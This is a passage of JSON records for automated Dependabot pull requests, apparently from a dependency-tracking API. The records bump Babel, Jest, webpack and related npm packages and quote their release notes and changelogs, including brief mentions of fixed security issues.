href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-runtime\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/preset-env` from 7.29.5 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/preset-env's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-preset-env\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel-jest` from 30.3.0 to 30.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/releases\"\u003ebabel-jest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev30.4.1\u003c/h2\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\"\u003ehttps://github.com/jestjs/jest/compare/v30.4.0...v30.4.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev30.4.0\u003c/h2\u003e\n\u003cp\u003eBig release! 😀\u003c/p\u003e\n\u003cp\u003eMain feature is a rewrite of our custom runtime in preparation for stabilisation of native support of ESM. As part of that work \u003ccode\u003erequire(esm)\u003c/code\u003e module is now supported on Node 24.9+ (still requires \u003ccode\u003e--experimental-vm-modules\u003c/code\u003e like before).\u003c/p\u003e\n\u003cp\u003eIn addition we now support fake timers for the recently released \u003ccode\u003eTemporal\u003c/code\u003e API in Node v26.\u003c/p\u003e\n\u003cp\u003eReact 19 is also supported properly in \u003ccode\u003epretty-format\u003c/code\u003e, meaning snapshots of React components now work like they should.\u003c/p\u003e\n\u003cp\u003eDue to all the changes, there might be regressions that snuck in. Please report them!\u003c/p\u003e\n\u003cp\u003eFull list of changes below\u003c/p\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode\u003eclearMocksOnScope(scope)\u003c/code\u003e on \u003ccode\u003eModuleMocker\u003c/code\u003e for clearing every mock function exposed on a scope object (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16088\"\u003e#16088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-resolve]\u003c/code\u003e Add \u003ccode\u003ecanResolveSync()\u003c/code\u003e on \u003ccode\u003eResolver\u003c/code\u003e so callers can detect when a user-configured resolver only exports an \u003ccode\u003easync\u003c/code\u003e hook (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16064\"\u003e#16064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Use synchronous \u003ccode\u003eevaluate()\u003c/code\u003e for ES modules without top-level \u003ccode\u003eawait\u003c/code\u003e on Node versions that support it (v24.9+), and prefer the synchronous transform path when a sync transformer is configured (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Support \u003ccode\u003erequire()\u003c/code\u003e of ES modules on Node v24.9+ (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16074\"\u003e#16074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Validate TC39 import attributes (\u003ccode\u003ewith { type: 'json' }\u003c/code\u003e) on ESM imports (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16127\"\u003e#16127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/transform]\u003c/code\u003e Add \u003ccode\u003ecanTransformSync(filename)\u003c/code\u003e on \u003ccode\u003eScriptTransformer\u003c/code\u003e so callers can pick the sync vs async transform path (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16062\"\u003e#16062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-util]\u003c/code\u003e Add \u003ccode\u003eisError\u003c/code\u003e helper (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16076\"\u003e#16076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[pretty-format]\u003c/code\u003e Support React 19 (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16123\"\u003e#16123\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[expect-utils]\u003c/code\u003e Fix \u003ccode\u003etoStrictEqual\u003c/code\u003e failing on \u003ccode\u003estructuredClone\u003c/code\u003e results due to cross-realm constructor mismatch (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15959\"\u003e#15959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/expect-utils]\u003c/code\u003e Prevent \u003ccode\u003etoMatchObject\u003c/code\u003e/subset matching from throwing when encountering exotic iterables (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15952\"\u003e#15952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[fake-timers]\u003c/code\u003e Convert \u003ccode\u003eDate\u003c/code\u003e to milliseconds before passing to \u003ccode\u003e@sinonjs/fake-timers\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16029\"\u003e#16029\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest]\u003c/code\u003e Export \u003ccode\u003eGlobalConfig\u003c/code\u003e and \u003ccode\u003eProjectConfig\u003c/code\u003e TypeScript types (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16132\"\u003e#16132\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jestjs/jest/blob/main/CHANGELOG.md\"\u003ebabel-jest's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e30.4.1\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-runner, jest-schemas, jest-types]\u003c/code\u003e Allow custom runner configuration options via tuple format \u003ccode\u003e['runner-path', {options}]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16141\"\u003e#16141\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[jest-runtime]\u003c/code\u003e Align CJS-from-ESM default export with Node: \u003ccode\u003emodule.exports\u003c/code\u003e is always the ESM default, \u003ccode\u003e__esModule\u003c/code\u003e unwrapping is no longer applied (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16143\"\u003e#16143\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e30.4.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e[babel-jest]\u003c/code\u003e Support collecting coverage from \u003ccode\u003e.mts\u003c/code\u003e, \u003ccode\u003e.cts\u003c/code\u003e (and other) files (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15994\"\u003e#15994\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-circus, jest-cli, jest-config, jest-core, jest-jasmine2, jest-types]\u003c/code\u003e Add \u003ccode\u003e--collect-tests\u003c/code\u003e flag to discover and list tests without executing them (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16006\"\u003e#16006\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-runner, jest-worker]\u003c/code\u003e Add \u003ccode\u003eworkerGracefulExitTimeout\u003c/code\u003e config option to control how long workers are given to exit before being force-killed (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/15984\"\u003e#15984\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config]\u003c/code\u003e Add support for \u003ccode\u003ejest.config.mts\u003c/code\u003e as a valid configuration file (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16005\"\u003e#16005\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-config, jest-core, jest-reporters, jest-runner]\u003c/code\u003e \u003ccode\u003everbose\u003c/code\u003e and \u003ccode\u003esilent\u003c/code\u003e can now be set per-project; the project-level value overrides the global value for that project's tests (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16133\"\u003e#16133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Duration\u003c/code\u003e in \u003ccode\u003ejest.advanceTimersByTime()\u003c/code\u003e and \u003ccode\u003ejest.advanceTimersByTimeAsync()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Accept \u003ccode\u003eTemporal.Instant\u003c/code\u003e and \u003ccode\u003eTemporal.ZonedDateTime\u003c/code\u003e in \u003ccode\u003ejest.setSystemTime()\u003c/code\u003e and \u003ccode\u003euseFakeTimers({now})\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16128\"\u003e#16128\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[@jest/fake-timers]\u003c/code\u003e Support faking \u003ccode\u003eTemporal.Now.*\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/jestjs/jest/pull/16131\"\u003e#16131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e[jest-mock]\u003c/code\u003e Add \u003ccode...\n\n_Description has been truncated_","html_url":"https://github.com/guardian/commercial/pull/2574","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/guardian%2Fcommercial/issues/2574","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2574/packages"},{"uuid":"4583864351","node_id":"PR_kwDOEAXZzs7ibUKp","number":21,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 22 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-03T21:42:41.000Z","updated_at":"2026-06-03T21:44:17.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":22,"packages":[{"name":"webpack","old_version":"5.88.0","new_version":"5.104.1","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"4.15.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"cross-spawn","old_version":"7.0.3","new_version":"7.0.6","repository_url":"https://github.com/moxystudio/node-cross-spawn"},{"name":"follow-redirects","old_version":"1.15.2","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"micromatch","old_version":"4.0.4","new_version":"4.0.8","repository_url":"https://github.com/micromatch/micromatch"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"nanoid","old_version":"3.3.6","new_version":"3.3.12","repository_url":"https://github.com/ai/nanoid"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"postcss","old_version":"8.4.24","new_version":"8.5.15","repository_url":"https://github.com/postcss/postcss"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 10 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [webpack](https://github.com/webpack/webpack) | `5.88.0` | `5.104.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `4.15.1` | `5.2.4` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `7.0.3` | `7.0.6` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.2` | `1.16.0` |\n| [micromatch](https://github.com/micromatch/micromatch) | `4.0.4` | `4.0.8` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [nanoid](https://github.com/ai/nanoid) | `3.3.6` | `3.3.12` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [postcss](https://github.com/postcss/postcss) | `8.4.24` | `8.5.15` |\n\n\nUpdates `webpack` from 5.88.0 to 5.104.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.104.1\u003c/h2\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.104.0\u003c/h2\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.103.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003eDotenvPlugin\u003c/code\u003e and top level \u003ccode\u003edotenv\u003c/code\u003e option to enable this plugin\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eWebpackManifestPlugin\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdded support the \u003ccode\u003eignoreList\u003c/code\u003e option in devtool plugins\u003c/li\u003e\n\u003cli\u003eAllow to use custom javascript parse function\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.104.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2efd21b: Reexports runtime calculation should not accessing \u003cstrong\u003eWEBPACK_IMPORT_KEY\u003c/strong\u003e decl with var.\u003c/li\u003e\n\u003cli\u003ec510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.104.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed3dd841: Use method shorthand to render module content in \u003ccode\u003e__webpack_modules__\u003c/code\u003e object.\u003c/li\u003e\n\u003cli\u003ed3dd841: Enhance \u003ccode\u003eimport.meta.env\u003c/code\u003e to support object access.\u003c/li\u003e\n\u003cli\u003e4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.\u003c/li\u003e\n\u003cli\u003e04cd530: Handle more at-rules for CSS modules.\u003c/li\u003e\n\u003cli\u003ecafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is 